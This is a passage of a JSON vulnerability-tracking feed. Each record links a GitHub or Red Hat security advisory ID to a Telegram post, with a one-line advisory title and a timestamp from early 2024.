"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GCCQ-H3XJ-JGVF", "type": "seen", "source": "https://t.me/ctinow/183210", "content": "https://ift.tt/mh6kLVd\n[GHSA-gccq-h3xj-jgvf] Pixelfed doesn't check OAuth Scopes in API routes, giving elevated permissions", "creation_timestamp": "2024-02-12T16:26:28.000000Z"}, {"uuid": "d47163b2-7aa7-4c90-8612-32fd7f9514fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3HV4-R2FM-H27F", "type": "seen", "source": "https://t.me/ctinow/184311", "content": "https://ift.tt/UR16uB4\n[GHSA-3hv4-r2fm-h27f] Email Validation Bypass And Preventing Sign Up From Email's Owner", "creation_timestamp": "2024-02-13T23:36:52.000000Z"}, {"uuid": "fdb4794c-f424-4bf4-be8d-515b8e9d62e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-68W7-72JG-6QPP", "type": "seen", "source": "https://t.me/ctinow/184274", "content": "https://ift.tt/4byaFtc\n[GHSA-68w7-72jg-6qpp] NuGet Client Security Feature Bypass Vulnerability", "creation_timestamp": "2024-02-13T22:26:05.000000Z"}, {"uuid": "0aaa47a0-ad10-49e6-844d-fb1fafe30716", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5W2H-59J3-8X5W", "type": "seen", "source": "https://t.me/ctinow/184244", "content": "https://ift.tt/9hKfybv\n[GHSA-5w2h-59j3-8x5w] TYPO3 Install Tool vulnerable to Code Execution", "creation_timestamp": "2024-02-13T21:46:49.000000Z"}, {"uuid": "b5631a08-213f-40cf-b890-4dd8476c962a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0805", "type": "seen", "source": "https://t.me/ctinow/184128", "content": "https://ift.tt/CjrTEvS\nRHSA-2024:0805: Important: dotnet7.0 security update", "creation_timestamp": "2024-02-13T20:16:47.000000Z"}, {"uuid": "b1e4821d-51a6-4d7f-9f4a-6a2c62b843d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0811", "type": "seen", "source": "https://t.me/ctinow/184341", "content": "https://ift.tt/oTdxZgp\nRHSA-2024:0811: Moderate: sudo security update", "creation_timestamp": "2024-02-14T01:16:29.000000Z"}, {"uuid": "dbc70990-48b9-4ea7-88e7-8c70785daf24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-99VC-XW8J-PHJM", "type": "seen", "source": "https://t.me/ctinow/183392", "content": "https://ift.tt/hAIaB2D\n[GHSA-99vc-xw8j-phjm] Ghost has possible Cross-site Scripting issue", "creation_timestamp": "2024-02-12T20:46:25.000000Z"}, {"uuid": "aae9ee46-9425-4e0e-9c24-201dcb8cdb61", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3RW-77W7-92GF", "type": "seen", "source": "https://t.me/ctinow/183324", "content": "https://ift.tt/lqNSWbX\n[GHSA-h3rw-77w7-92gf] Samly access control vulnerability", "creation_timestamp": "2024-02-12T18:36:46.000000Z"}, {"uuid": "4280ace6-f8b7-4e55-9a64-2a3eb09e33a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0785", "type": "seen", "source": "https://t.me/ctinow/183311", "content": "https://ift.tt/Eg1emMw\nRHSA-2024:0785: Moderate: nss security update", "creation_timestamp": "2024-02-12T18:16:59.000000Z"}, {"uuid": "82c32711-84d6-4d2d-87e5-a29209fa2b73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0790", "type": "seen", "source": "https://t.me/ctinow/183310", "content": "https://ift.tt/yBpTlwt\nRHSA-2024:0790: Moderate: nss security update", "creation_timestamp": "2024-02-12T18:16:58.000000Z"}, {"uuid": "aab840e6-c304-4612-9df4-8431a879c2c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0791", "type": "seen", "source": "https://t.me/ctinow/183309", "content": "https://ift.tt/V6OKL48\nRHSA-2024:0791: Moderate: nss security update", "creation_timestamp": "2024-02-12T18:16:57.000000Z"}, {"uuid": "65839d63-746b-49b3-ac04-38eb3b666dbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0684", "type": "seen", "source": "https://t.me/ctinow/183308", "content": "https://ift.tt/XmBidrD\nRHSA-2024:0684: Moderate: OpenShift Container Platform 4.11.58 packages and security update", "creation_timestamp": "2024-02-12T18:16:56.000000Z"}, {"uuid": "be84c4cb-e03e-4ba1-8cb6-8be279ddcd1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0754", "type": "seen", "source": "https://t.me/ctinow/183307", "content": "https://ift.tt/E4Vzmob\nRHSA-2024:0754: Important: python-pillow security update", "creation_timestamp": "2024-02-12T18:16:55.000000Z"}, {"uuid": "e1059e49-00bd-4752-8ee9-43015b9c06c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0735", "type": "seen", "source": "https://t.me/ctinow/184060", "content": "https://ift.tt/Mn7U9SI\nRHSA-2024:0735: Critical: OpenShift Container Platform 4.14.z security update", "creation_timestamp": "2024-02-13T19:17:23.000000Z"}, {"uuid": "36ec0e19-ec93-4dcb-b0ae-6f722e35c2d0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0798", "type": "seen", "source": "https://t.me/ctinow/184004", "content": "https://ift.tt/5DsBpSa\nRHSA-2024:0798: Important: Red Hat Single Sign-On 7.6.7 security update on RHEL 7", "creation_timestamp": "2024-02-13T18:16:53.000000Z"}, {"uuid": "772b1866-c91c-4097-ae75-ef47066c8ea1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0800", "type": "seen", "source": "https://t.me/ctinow/184003", "content": "https://ift.tt/BCZ7AmU\nRHSA-2024:0800: Important: Red Hat Single Sign-On 7.6.7 security update on RHEL 9", "creation_timestamp": "2024-02-13T18:16:52.000000Z"}, {"uuid": "b65db01f-4e58-4596-8f2b-2d86117827cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0797", "type": "seen", "source": "https://t.me/ctinow/183915", "content": "https://ift.tt/9W3RZIf\nRHSA-2024:0797: Important: Satellite 6.14.2 Async Security Update", "creation_timestamp": "2024-02-13T16:16:48.000000Z"}, {"uuid": "9720e306-092c-4f7b-98bc-76f653e0b6be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4W4V-5HC9-XRR2", "type": "seen", "source": "https://t.me/ctinow/183913", "content": "https://ift.tt/p0sI7zu\n[GHSA-4w4v-5hc9-xrr2] angular vulnerable to super-linear runtime due to backtracking", "creation_timestamp": "2024-02-13T16:16:45.000000Z"}, {"uuid": "a978d969-3eb5-4151-92bd-ed26a0a339aa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG2R-QF99-4WVR", "type": "seen", "source": "https://t.me/ctinow/183888", "content": "https://ift.tt/upbydrF\nCVE-2019-18923 | go-camo up to 2.1.0 cross site scripting (GHSA-jg2r-qf99-4wvr)", "creation_timestamp": "2024-02-13T15:36:21.000000Z"}, {"uuid": "48e27f94-e66b-429a-9a9d-30a253832588", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X4HH-FRX8-98R5", "type": "seen", "source": "https://t.me/ctinow/177798", "content": "https://ift.tt/lUdqGZP\n[GHSA-x4hh-frx8-98r5] Bref's Uploaded Files Not Deleted in Event-Driven Functions", "creation_timestamp": "2024-02-01T22:06:57.000000Z"}, {"uuid": "86cc38d2-2527-40d1-9c70-e56d42c4e1a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P92-QFQF-QWX4", "type": "seen", "source": "https://t.me/ctinow/183200", "content": "https://ift.tt/KCdJoz5\n[GHSA-6p92-qfqf-qwx4] OpenRefine JDBC Attack Vulnerability", "creation_timestamp": "2024-02-12T16:16:42.000000Z"}, {"uuid": "954db65a-e8a3-4382-aaa0-b26f74d316de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-27P5-32PP-R58R", "type": "seen", "source": "https://t.me/ctinow/178349", "content": "https://ift.tt/vRolg7I\nCVE-2023-42463 | Wazuh up to 4.5.2 stack-based overflow (GHSA-27p5-32pp-r58r)", "creation_timestamp": "2024-02-03T01:46:18.000000Z"}, {"uuid": "dfbaa8e2-3c43-4911-a93a-1db4d41a2ee8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HF2V-R5XM-8P37", "type": "seen", "source": "https://t.me/ctinow/178338", "content": "https://ift.tt/MROJwXH\nCVE-2023-48297 | Discourse up to 3.1.3/3.2.0.beta4 Message Serializer resource consumption (GHSA-hf2v-r5xm-8p37)", "creation_timestamp": "2024-02-03T00:51:34.000000Z"}, {"uuid": "a8e79179-09dd-408d-9e7a-fc5fcfb61859", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0786", "type": "seen", "source": "https://t.me/ctinow/183159", "content": "https://ift.tt/aqsfrZ8\nRHSA-2024:0786: Moderate: nss security update", "creation_timestamp": "2024-02-12T15:17:05.000000Z"}, {"uuid": "cfb8eae7-2955-4bd4-b27c-59dfc350b856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0771", "type": "seen", "source": "https://t.me/ctinow/182996", "content": "https://ift.tt/3AfFXJT\nRHSA-2024:0771: Important: squid:4 security update", "creation_timestamp": "2024-02-12T10:16:25.000000Z"}, {"uuid": "c7f14d30-1092-4f0a-856d-e94b32722272", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0772", "type": "seen", "source": "https://t.me/ctinow/182995", "content": "https://ift.tt/qaerkhl\nRHSA-2024:0772: Important: squid:4 security update", "creation_timestamp": "2024-02-12T10:16:23.000000Z"}, {"uuid": "538327e7-aeaa-4670-878a-e3136c0361b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PGPJ-V85Q-H5FM", "type": "seen", "source": "https://t.me/ctinow/182953", "content": "https://ift.tt/9Hr8iQD\nCVE-2024-22416 | pyLoad up to 0.5.0b3.dev77 API cross-site request forgery (GHSA-pgpj-v85q-h5fm)", "creation_timestamp": "2024-02-12T09:02:37.000000Z"}, {"uuid": "fec5daa4-4e1e-46a0-84ab-c19cb6f63a54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5P2X-8427-9FGP", "type": "seen", "source": "https://t.me/ctinow/183328", "content": "https://ift.tt/9nQ0jgu\n[GHSA-5p2x-8427-9fgp] Moodle Improper Access Control vulnerability", "creation_timestamp": "2024-02-12T18:46:34.000000Z"}, {"uuid": "7bffd7fb-ccfb-494d-8e52-853ec6c34aed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0755", "type": "seen", "source": "https://t.me/ctinow/183306", "content": "https://ift.tt/EB4kJU8\nRHSA-2024:0755: Important: runc security update", "creation_timestamp": "2024-02-12T18:16:54.000000Z"}, {"uuid": "960bb857-e936-4331-acfb-5b08438bf0b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0723", "type": "seen", "source": "https://t.me/ctinow/183305", "content": "https://ift.tt/SRCeXFu\nRHSA-2024:0723: Important: kernel security update", "creation_timestamp": "2024-02-12T18:16:53.000000Z"}, {"uuid": "ecb35532-5406-4639-859e-f58dbbddd2e3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22Q8-GHMQ-63VF", "type": "seen", "source": "https://t.me/ctinow/183241", "content": "https://ift.tt/fpF9jyE\n[GHSA-22q8-ghmq-63vf] libgit2-sys affected by memory corruption, denial of service, and arbitrary code execution in libgit2", "creation_timestamp": "2024-02-12T16:56:48.000000Z"}, {"uuid": "89e6bd9c-e406-4bdf-a541-6bc1c409e3ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0320", "type": "seen", "source": "https://t.me/ctinow/183028", "content": "https://ift.tt/et67rTh\nCVE-2024-0409 | X.org X11 Server Privates out-of-bounds write (RHSA-2024:0320)", "creation_timestamp": "2024-02-12T11:07:20.000000Z"}, {"uuid": "920655b1-d2f6-422e-984d-d24803ee0f8c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0320", "type": "seen", "source": "https://t.me/ctinow/183019", "content": "https://ift.tt/kNlqmUn\nCVE-2024-0408 | X.org X11 Server GLX PBuffer denial of service (RHSA-2024:0320)", "creation_timestamp": "2024-02-12T10:41:49.000000Z"}, {"uuid": "5b2bce2e-3de3-43a5-9109-f26098971c6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0775", "type": "seen", "source": "https://t.me/ctinow/183064", "content": "https://ift.tt/3eU1T7l\nRHSA-2024:0775: Important: jenkins and jenkins-2-plugins security update", "creation_timestamp": "2024-02-12T12:16:21.000000Z"}, {"uuid": "23c23a55-7c77-4476-8b06-a7b9c5232648", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4V23-VJ8H-7JP2", "type": "seen", "source": "https://t.me/ctinow/178358", "content": "https://ift.tt/A3ZY1iH\nCVE-2024-21654 | RubyGems.org 2FA improper authentication (GHSA-4v23-vj8h-7jp2)", "creation_timestamp": "2024-02-03T02:26:53.000000Z"}, {"uuid": "d656a515-537e-45b6-97c1-7725650b5620", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2MRQ-W8PV-5PVQ", "type": "seen", "source": "https://t.me/ctinow/178225", "content": "https://ift.tt/T0H5sXj\n[GHSA-2mrq-w8pv-5pvq] Malicious input can provoke XSS when preserving comments", "creation_timestamp": "2024-02-02T19:16:55.000000Z"}, {"uuid": "1ba14d99-2b1b-4fa6-8300-e5f5a6c01a93", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GP3W-2V2M-P686", "type": "seen", "source": "https://t.me/ctinow/178224", "content": "https://ift.tt/FKWVv34\n[GHSA-gp3w-2v2m-p686] Vyper's external calls can overflow return data to return input buffer", "creation_timestamp": "2024-02-02T19:16:54.000000Z"}, {"uuid": "c8b540b7-549c-496a-8e7a-9b834054798b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G5P6-327M-3FXX", "type": "seen", "source": "https://t.me/ctinow/178223", "content": "https://ift.tt/N7Bg3Cp\n[GHSA-g5p6-327m-3fxx] Talos Linux ships runc vulnerable to the escape to the host attack", "creation_timestamp": "2024-02-02T19:16:53.000000Z"}, {"uuid": "34cf683b-33c8-4c82-803c-fa602d435124", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-547X-748V-VP6P", "type": "seen", "source": "https://t.me/ctinow/178222", "content": "https://ift.tt/1A7UiuZ\n[GHSA-547x-748v-vp6p] Dash apps vulnerable to Cross-site Scripting", "creation_timestamp": "2024-02-02T19:16:52.000000Z"}, {"uuid": "32cd838c-07f8-47dd-b745-35685725afb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9GH8-877R-G477", "type": "seen", "source": "https://t.me/ctinow/178221", "content": "https://ift.tt/AWPJw6u\n[GHSA-9gh8-877r-g477] Beetl Server-Side Template Injection vulnerability", "creation_timestamp": "2024-02-02T19:16:50.000000Z"}, {"uuid": "dadbce28-04e3-46b4-9582-9ae095e139e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-Q6W5-JG5Q-47VG", "type": "seen", "source": "https://t.me/ctinow/178357", "content": "https://ift.tt/tRLQlZS\nCVE-2024-22206 | clerk javascript up to 4.29.2 auth/getAuth authorization (GHSA-q6w5-jg5q-47vg)", "creation_timestamp": "2024-02-03T02:26:52.000000Z"}, {"uuid": "292748c7-ba6b-475a-a64a-27ce6eafe819", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6VV-VV26-RH7C", "type": "seen", "source": "https://t.me/ctinow/176382", "content": "https://ift.tt/P51mjLX\n[GHSA-j6vv-vv26-rh7c] HashiCorp Vault Improper Privilege Management", "creation_timestamp": "2024-01-31T00:52:10.000000Z"}, {"uuid": "545a227e-970c-46b6-994d-93e0ce812092", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-475G-VJ6C-XF96", "type": "seen", "source": "https://t.me/ctinow/176285", "content": "https://ift.tt/u3A0fK5\n[GHSA-475g-vj6c-xf96] CrateDB database has an arbitrary file read vulnerability", "creation_timestamp": "2024-01-30T22:07:24.000000Z"}, {"uuid": "017e163b-8228-4886-955b-fbb97fb43165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45GQ-Q4XH-CP53", "type": "seen", "source": "https://t.me/ctinow/176284", "content": "https://ift.tt/KajGt7F\n[GHSA-45gq-q4xh-cp53] vantage6 vulnerable to username timing attack", "creation_timestamp": "2024-01-30T22:07:23.000000Z"}, {"uuid": "b72f8b8c-8cf7-4cbe-a68e-8e8f9cc0bbdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJMV-52MP-GJRR", "type": "seen", "source": "https://t.me/ctinow/176283", "content": "https://ift.tt/UzOatBr\n[GHSA-rjmv-52mp-gjrr] vantage6 may create unencrypted tasks in encrypted collaboration", "creation_timestamp": "2024-01-30T22:07:22.000000Z"}, {"uuid": "492578a9-25b1-4d88-8f21-3ab1d5ab742f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2WGC-48G2-CJ5W", "type": "seen", "source": "https://t.me/ctinow/176282", "content": "https://ift.tt/y9zHImU\n[GHSA-2wgc-48g2-cj5w] vantage6 has insecure SSH configuration for node and server containers", "creation_timestamp": "2024-01-30T22:07:21.000000Z"}, {"uuid": "43159214-6682-4eda-9f02-e623a42a2c44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W9H2-PX87-74VX", "type": "seen", "source": "https://t.me/ctinow/176281", "content": "https://ift.tt/LNq4Bg0\n[GHSA-w9h2-px87-74vx] vantage6 remote code execution vulnerability", "creation_timestamp": "2024-01-30T22:07:19.000000Z"}, {"uuid": "9ca11da7-adc3-49a0-afba-fe96829fa316", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-H3Q2-8WHX-C29H", "type": "seen", "source": "https://t.me/ctinow/176280", "content": "https://ift.tt/2b5tkJd\n[GHSA-h3q2-8whx-c29h] `goreleaser release --debug` shows secrets", "creation_timestamp": "2024-01-30T22:07:18.000000Z"}, {"uuid": "d291615a-9e4a-4389-a311-3d5c8fbccc70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2C2-Q32W-4W6M", "type": "seen", "source": "https://t.me/ctinow/176215", "content": "https://ift.tt/q9kv6py\n[GHSA-x2c2-q32w-4w6m] Vyper's raw_call `value=` kwargs not disabled for static and delegate calls", "creation_timestamp": "2024-01-30T19:51:52.000000Z"}, {"uuid": "034e69b9-44e0-473f-9e55-e467cb48d161", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0564", "type": "seen", "source": "https://t.me/ctinow/175930", "content": "https://ift.tt/xrUgvhV\nRHSA-2024:0564: Moderate: container-tools:3.0 security update", "creation_timestamp": "2024-01-30T14:21:55.000000Z"}, {"uuid": "06fd2988-27c6-463e-9b4d-2f81caec4c45", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0565", "type": "seen", "source": "https://t.me/ctinow/175929", "content": "https://ift.tt/zk5iJZ2\nRHSA-2024:0565: Important: thunderbird security update", "creation_timestamp": "2024-01-30T14:21:51.000000Z"}, {"uuid": "17a06a80-2bbd-4d44-af2b-89a07aa81513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0569", "type": "seen", "source": "https://t.me/ctinow/175928", "content": "https://ift.tt/UyGk18e\nRHSA-2024:0569: Moderate: virt:rhel and virt-devel:rhel security update", "creation_timestamp": "2024-01-30T14:21:50.000000Z"}, {"uuid": "3bad5519-406c-451b-8458-d7eb1dbb0dc9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0571", "type": "seen", "source": "https://t.me/ctinow/175927", "content": "https://ift.tt/89Rm2vU\nRHSA-2024:0571: Moderate: tcpdump security update", "creation_timestamp": "2024-01-30T14:21:49.000000Z"}, {"uuid": "7656eb5f-33b1-4425-86be-55ca8b6c4b1b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0572", "type": "seen", "source": "https://t.me/ctinow/175926", "content": "https://ift.tt/QUtuqsl\nRHSA-2024:0572: Moderate: oniguruma security update", "creation_timestamp": "2024-01-30T14:21:48.000000Z"}, {"uuid": "1329ae32-d00f-4028-b7cb-dba2a453aa8b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V89Q-C273-3P42", "type": "seen", "source": "https://t.me/ctinow/176213", "content": "https://ift.tt/MBYyojX\n[GHSA-v89q-c273-3p42] Craft CMS Audit Plugin Cross Site Scripting vulnerability", "creation_timestamp": "2024-01-30T19:51:49.000000Z"}, {"uuid": "e24960b1-8dc6-43dd-afc9-21d7130941c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VVH2-82C7-PPFG", "type": "seen", "source": "https://t.me/ctinow/176212", "content": "https://ift.tt/28Hgl6v\n[GHSA-vvh2-82c7-ppfg] network Arbitrary Command Injection vulnerability", "creation_timestamp": "2024-01-30T19:51:48.000000Z"}, {"uuid": "1d3b4074-0ae4-461d-8d47-ee39fdc46b99", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7MGX-GVJW-M3W3", "type": "seen", "source": "https://t.me/ctinow/176211", "content": "https://ift.tt/3PSZftb\n[GHSA-7mgx-gvjw-m3w3] CrateDB authentication bypass vulnerability", "creation_timestamp": "2024-01-30T19:51:47.000000Z"}, {"uuid": "d8d7f7e7-2dff-4ee8-8da3-d7f08b1a4b62", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8XW6-9H78-C89J", "type": "seen", "source": "https://t.me/ctinow/176210", "content": "https://ift.tt/kFEa9GC\n[GHSA-8xw6-9h78-c89j] Ylianst MeshCentral Missing SSL Certificate Validation", "creation_timestamp": "2024-01-30T19:51:46.000000Z"}, {"uuid": "9858fe94-036c-4472-9eef-5bf7f06ba3a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0484", "type": "seen", "source": "https://t.me/ctinow/177715", "content": "https://ift.tt/N6bxSUP\nRHSA-2024:0484: Important: OpenShift Container Platform 4.13.31 bug fix and security update", "creation_timestamp": "2024-02-01T18:16:37.000000Z"}, {"uuid": "0557ecff-1607-4337-820e-4f3732d2478d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:0647", "type": "seen", "source": "https://t.me/ctinow/177580", "content": "https://ift.tt/EGtMBwc\nRHSA-2024:0647: Moderate: rpm security update", "creation_timestamp": "2024-02-01T14:16:58.000000Z"}, {"uuid": "bef8b7a8-bdab-427c-92c4-1d9d4006f16e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:3520", "type": "seen", "source": "https://t.me/ctinow/177579", "content": "https://ift.tt/gRV5mzD\nCVE-2019-5010 | Python 2.7.11/3.6.6 X.509 Certificate Crafted Certificate null pointer dereference (RHSA-2019:3520 / Nessus ID 121540)", "creation_timestamp": "2024-02-01T14:16:57.000000Z"}, {"uuid": "1269a251-aa2d-420d-9c55-96f8d0fd0cf7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQF7-8G85-VX2Q", "type": "seen", "source": "https://t.me/ctinow/178566", "content": "https://ift.tt/ihEtALm\nCVE-2023-50729 | Traccar up to 5.10 unrestricted upload (GHSA-pqf7-8g85-vx2q)", "creation_timestamp": "2024-02-03T14:51:57.000000Z"}, {"uuid": "d1c28c7d-eb55-461e-839a-38319ead239f", "vulnerability_lookup_origin": 